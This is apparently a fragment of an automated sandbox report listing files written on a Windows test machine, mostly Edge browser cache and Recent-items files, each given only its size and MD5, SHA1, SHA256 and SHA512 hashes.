SHA5125fa4fe6bded6a6ba57b51ea88f7d54cc875dcd58c59bde9f0af9048260406d187ca86568ddb31d4d29e75c3256b79444ca67c52613659293e73e2c2094ebffde
-
Filesize
314KB
MD526cfc528bbf3f9545a35f07fd4cc4c83
SHA168c18ab5b58b839bca80835b6fece6081e5ecd04
SHA256813b795e6bab991add6fcc2f9b4e8f938681ab29f21b280f1348b3d1198e8147
SHA512226ab5af99230fef492ecbbd33c1c4ef9ffdcd8e9c48997455942196c1bf653404313890b7240b781e57e6e456ddb9b921a7031abb85b653b534d3340d4f6a4c
-
Filesize
1.7MB
MD5272d3e458250acd2ea839eb24b427ce5
SHA1fae7194da5c969f2d8220ed9250aa1de7bf56609
SHA256bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3
SHA512d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize4KB
MD57a55f645ed3eab614905faedc1166557
SHA1fe7dc28c02e6a1486ad4983ad1e2a89f318ac429
SHA25677f1e0d590aa1ac12d87fac75c747ad657ba94d8b4156203e9973df86a6c6612
SHA512d551fdced0a8a468ee13cfc856d468078da15ca37f5e641e47b5f3df862762060ec9dbae505dc0b73e6756bd8b159863fa76d1590abfed9c838b91582c45dde5
-
Filesize
2KB
MD5ac2b80034028d2f8ce838f1176e700d1
SHA1f9e69804ff9375ac345a9ad3463ce8489323082a
SHA25663fbd324596e5edbe5e36ff0b0f63c1db05465d2f04b5b8566c08d4c5ef4e59e
SHA512d6722bdea0854a78c57192dc8715927edf3c94185acb6bb3e900774b17c16053d7f98e99ad2e0e3771f147cec8b687809c0fba64e9410bbcbf6d3b45a5650f67
-
Filesize
4KB
MD5a7d079215ec676e6ecfbb15675914502
SHA144bf184b2652b2736aef4a9850e14334c57b69d1
SHA25680e4bb4fc7e5d3f8526f5fd241b3efb151c6b3838b0cb16c930fe44670452fd3
SHA5121d75b4922e7b72f0e4c2aec67b3ad1bf63614badbf380971e8e2d91d1b42ba1626974415e294412a070e5b4cb0ab8e7a15bbb76c0066c79b0f5be05cd0143936
-
Filesize
8KB
MD558c666c77c9dc0870914e8c6a670e98f
SHA1d23f797066cb4e8458738dba7951c5830b863c9b
SHA256fc8acaa0742075dd731b879fe74397c8c8aee395fb81b43ea583f1e02db35fd8
SHA5129638a5f143a16c5c7d180eca10c9c9dabb61c84f859778c6e93e15c6e69d9e7241ecb7fb3031a99878a8bcca8f6b969c46f039dc699ddd7df4aa7e90776ea8c0
-
Filesize
8KB
MD53bf2c27f0c8828de7e06329b1eeb27d0
SHA127393290691bc08d2cd9a7c85a388288098509c8
SHA2568308e7cb5e2578ed053692a6d5c9f0a7708d18d961acca0aea9a2b52e7ab311c
SHA5128a3e821e1c245784aea30cea6f1720ca70accfbfe621c034b3b55d5d08050194e86b1b976e377c30baa8717b36c75ca22376be020488bb06610d5cba2fa531d8
-
Filesize
7KB
MD560968c9c1d80607d0e84a548ef5d2c8e
SHA1a082a72a6c4cc983be52dbc3de0f1fab3506e98b
SHA256d4e60b55f65f13024d1e7f08bf4454a9eb04829404863c013144fb8f010d6199
SHA51203bdbad3d8cf128a15e1ef30805737da3c96656d9e4132efaac40340e56eea93b31fbf14453c0f5aa38819a13786a67e45ebd5c60af9ee12184ea1d1ab8df8b1
-
Filesize
8KB
MD5b4da7ec7fb35e9d55f1151f96a9181ec
SHA17b7a48f29191892ba42e51fada048aaaa3bb7b84
SHA25684a61bd39a22be416563267fc0ae743d9794eef29a0bad74b0d929a21f577ea9
SHA512ff2006c056972202eb42ccf76e9c8133e60428789e604b859ab62fdcdbcc3ae9bd7a13d9606b9e9ecf2cb3c9845b92aa63c1d74aa94269f19caa370ee8b7c813
-
Filesize
5KB
MD5aa544cbd5b7d730a265807f253fe2995
SHA1c652e19ce41e6814784c480dacfc8af054e6826e
SHA256d5e3cb2ed8c53a28908861940ad8a51e7aa5bd52055d54e416d041182c3a7df8
SHA5125b7add7f2f452551446a92858f61d3679aaa3bb7706e98d66d68072577b91f90290f091457186cfa6f2ab04bd336b468d72edf84c51f260b0d70924cf2aaa467
-
Filesize
6KB
MD5db4c255461afe45ede8ac8240adbf45a
SHA1cb3e4274e5d51e8b26a50afaa95a2f490a5494bb
SHA256fd92a28313bed6720343d79e08529e223a4f85977202ff43c8dcd1b31f93f0be
SHA51279b0d9b1ed23460434330aae39ee25e673ded89f89b91175597daf31fa188209fbb43cf3f95baeb1154cc2cff9d2d516fa9d614bf2374016efbcc24b28928216
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD5b64cd384949f416d42b005f0e95f057e
SHA1b8bde812da1089cd274cb52797b2c75f578b2c8b
SHA256e6c22dc35ce51b36916e5ba622e898a58726bc949348cc6642e7ce7fd3ec82a3
SHA5124b66222909dfbf2899fc173502c5a26f8b02a62de58489b42fc7dee613061ad692909b42d79f789d70fa9f84d22eba01af0f5acc3becd80d9950bf932f30b9c6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe590843.TMP
Filesize48B
MD51008f59f5f56e1178b9ef954908125d2
SHA13322a5c285dcf6d5d18454a3bbd3cb1e21a9e2c1
SHA256e6c329c53b0e11b1e24be8c0f9849ba2024e4a3d4a8cd4449b5492c72c6bff9f
SHA5122ccad5f854528cf06c7d8e7e86d7df446d1abb34f26e17bd5b9bdf98dd85a21179ee88980887147391162adad54beba91dd5894eb73fb664b8586d436839c73d
-
Filesize
1KB
MD544688592b0b439246a13b27a3b7e361e
SHA132c86e8d46c3b99b4868808a1eff21c77aa197be
SHA2568831ab527bf9f99d0a1f36f6df72644f59542727e379a6f46d42fbf204dc9789
SHA51205d2014139be0777a23df58e16d2ca36e14c5df88c883ff801d67117814e96b08dc3cbc5bee2edcc8e3c7d1446f69051bdcc067aeef2cc7355989389d4deb7ed
-
Filesize
3KB
MD55306d9eccbe23d91f4e3da8503a4db57
SHA18fd790362e1c4d920e577d767376f33c3d83aeb4
SHA256ae36dbd812c92aa33551e64c1252eeb8dd8674634121ed33c77bce47d3911602
SHA512cd833d4692178b4ed8bfe1c71d8b44b9cd245d86204fab131539447e89315d6fdc0e57136d73f353828f88890b257e368cf3b0a0b78bc5ef2e6254735bc4f121
-
Filesize
3KB
MD5be08a88a7a38d23fb9868809d73150d1
SHA192c580f65909ceb9e358360d81bd91df372efe9a
SHA256e989ff3de5b6442be99177d082caf8b8262edf30b7175287732fd86510e73ba8
SHA51200809271c3a55deead739f84e9e95b28f6ba600abd49b3a71f58d84a3b1073e20d05a987e2ddc44cdc3b679e8faf1804353a3286079b18f92241a0a2f8d6d54a
-
Filesize
3KB
MD560b5e67b05385ea36a0bfb35e7cbe71c
SHA1345e5962319d53305c946544b450522c3c0a24c2
SHA2566d4a352476f9669792b1f25a29580e90ce082e3e629ccc13acd0b362109ae56f
SHA51262b82aa161be3ff81b3726acdd233b3fc6f4e6977b150fd508d01e00d17bcc927ca92dfdfbbb1c4feefcdb1864b5bcb2be06716f1cf73b66db21b2526aa26332
-
Filesize
1KB
MD5128bf86a04ce3458a94ce27e68642bfe
SHA11359a364d9b66c0cef2c7229bf7bdc51327f7733
SHA2562cdd088b26ca580489f9a8e373c096ed908b448849958054e2b1213274343f05
SHA512f0b5587d3e838d69107ddcb5eefee71ccaca826803e5f00839a32c56e17e74745ce829e908c637ca1b46024a0f7f66528c07b5bbf6c308ffb2af9b48f6558ccc
-
Filesize
1KB
MD54139e70b6c786cb26be7e496c0e9f70b
SHA13c5ac38331dda23e566152284c92b19969f1a534
SHA256c23616dd7746f122f1f191d4bf9c6b566127c5bf7feb023159aa05698eb82df1
SHA512fdd44d7c4404a30cf77e5450e58d370949d5295476a6d2ed80d5874f64508be45b6f48c06077cb461b6ec35f03815ddc0c1d1b118e508d5401d5e8b057dadc06
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD533259e585d7a55ab1b3b6c3b9e16072c
SHA188d482679e3c00fc20a57e5b33c70951327e033f
SHA25674485c35dd5fe31942f919b5caa7d9fdf3b37bc0fc034821383e89e3adce92c4
SHA512e6317b24d5f4026944c0c0717cb223a090f001c77737d7efd310eb72b70b3b1ca7877a1f671c1036188613e6171e48a8d19b4f7ed5179847964a9e95f8335518
-
Filesize
11KB
MD57211bacbabfe32d37c3a5224779b75c2
SHA11c9476bcd3b82eca9089feaa7a9b39885383418a
SHA25604c47a5e2f2a26e00a05764e10d4f1c32486a9e0d3a2c177ba511618486cba10
SHA51294e68a91b980536183574626a416c12d5ff2f09cb69a311337f67c7cf9f3df3ad06aece931ee961acba58241603c787abd3c45c56c905e03b5bce0c12046aa5f
-
Filesize
10KB
MD55867f25c3d123374618d90fb9fb40e32
SHA148851434839917d8e2d99319747eba5d695ab952
SHA25642beb71b7ac742759cbe6590616784690335c2c43621d610d60bef4001acd43d
SHA5128df76d64cd8b6416e1b99d5c12e862321e14ffef7337ad8c98ce3879142759cb45dd677e6a9e212dc4ad2a4b1ba5347bf8367c27893a0ed40ecedd263a1e75bb
-
Filesize
64KB
MD5987a07b978cfe12e4ce45e513ef86619
SHA122eec9a9b2e83ad33bedc59e3205f86590b7d40c
SHA256f1a4a978ce1c4731df1594043135cf58d084fdf129dd1c8e4507c9e06eac5ea8
SHA51239b86540e4d35c84609ef66537b5aa02058e3d4293f902127c7d4eac8ffc65920cb5c69a77552fc085687eed66e38367f83c177046d0ecb8e6d135463cc142aa
-
Filesize
1024KB
MD5633436b5f5a9857e9c731be268aea8e3
SHA1b97fd9e2f2bf8864824a4cb65f1ff8d8b6fd68dc
SHA2568e9716c2470516c65524d719c3b631703e886e9333d3ddb94b4b78e69f155582
SHA5126c2b7bfdfd6d409b8be60ae59ec8286635762ce42e6c461e9aba3986a144fac36356b84fa646fba0bd77cf65b56fba162b3ecc780900b897d563e4a5b884ef76
-
Filesize
498B
MD590be2701c8112bebc6bd58a7de19846e
SHA1a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe
-
Filesize
9KB
MD57050d5ae8acfbe560fa11073fef8185d
SHA15bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b
-
Filesize
103KB
MD58bcd083e16af6c15e14520d5a0bd7e6a
SHA1c4d2f35d1fdb295db887f31bbc9237ac9263d782
SHA256b4f78ff66dc3f5f8ddd694166e6b596d533830792f9b5f1634d3f5f17d6a884a
SHA51235999577be0626b50eeab65b493d48af2ab42b699f7241d2780647bf7d72069216d99f5f708337a109e79b9c9229613b8341f44c6d96245fd1f3ac9f05814d6a
-
Filesize
48KB
MD5f724c6da46dc54e6737db821f9b62d77
SHA1e35d5587326c61f4d7abd75f2f0fc1251b961977
SHA2566cde4a9f109ae5473703c4f5962f43024d71d2138cbd889223283e7b71e5911c
SHA5126f83dd7821828771a9cae34881c611522f6b5a567f5832f9e4b9b4b59bf495f40ad78678bd86cba59d32ea8644b4aa5f052552774fea142b9d6da625b55b6afc
-
Filesize
1KB
MD557f0432c8e31d4ff4da7962db27ef4e8
SHA1d5023b3123c0b7fae683588ac0480cd2731a0c5e
SHA256b82e64e533789c639d8e193b78e06fc028ea227f55d7568865120be080179afc
SHA512bc082486503a95f8e2ce7689d31423386a03054c5e8e20e61250ca7b7a701e98489f5932eba4837e05ec935057f18633798a10f6f84573a95fcf086ee7cabcbf
-
Filesize
144B
MD5c0437fe3a53e181c5e904f2d13431718
SHA144f9547e7259a7fb4fe718e42e499371aa188ab6
SHA256f2571f03eb9d5ee4dca29a8fec1317ded02973c5dd233d582f56cebe98544f22
SHA512a6b488fc74dc69fc4227f92a06deb297d19cd54b0e07659f9c9a76ce15d1ef1d8fa4d607acdd03d30d3e2be2a0f59503e27fc95f03f3006e137fa2f92825e7e3
-
Filesize
1.3MB
MD535af6068d91ba1cc6ce21b461f242f94
SHA1cb054789ff03aa1617a6f5741ad53e4598184ffa
SHA2569ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e
SHA512136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169
-
Filesize
1KB
MD5486f7372a256b28051ed8c00a30e8ba7
SHA191cb6af10f1fb39e3e4adc004257fa30fc542cbb
SHA2565419a91c2e2fe6b0d4b186a1f7eaf76cf777523247a2123419b0f64aa1ccfbed
SHA512f553d1d27b326a90d03796598ad08482182dbd1c6dc650b091d951705d5b045f8b4a935d14c81e95764320ca307583c843cd70885703a9fa72e7e1d342a5c71c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms
Filesize3KB
MD5336f4bc8f98cef9e0d3a4c3fc0aae39c
SHA19f7a32bbda177d21e5930a12005a5d7fc93578d8
SHA25601267a04e36caccec93f9421d910479e7629deee82cabfa5e760d71e78c6991d
SHA51236d40180399a4a740bb16db5a1bed4dc91a118f1a90c2233d58e27f6dd45327f6367bc41b5e544d400200a37f2522922a9d5707e42077e20edfac597e3fc3ab6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\74d7f43c1561fc1e.customDestinations-ms
Filesize1KB
MD5075d6d964460d0c2fc7a5216a12a06bb
SHA17a300f542ab785a866beb7c971415c5878d912ed
SHA25613cacb5a3034ba93a585ab380dd0451f64abbe7cc1710f8717294c4f8f6ba6a1
SHA512a787cf2bf83d6afce0656157077b9b7f35a095ced2db063b830b62b4793827ee5b1bef7409821b5e49d1812ae3c4fbb6e1726c424c9fd29a040b280645c3c5e1
-
Filesize
861B
MD5c53dee51c26d1d759667c25918d3ed10
SHA1da194c2de15b232811ba9d43a46194d9729507f0
SHA256dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52
SHA512da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c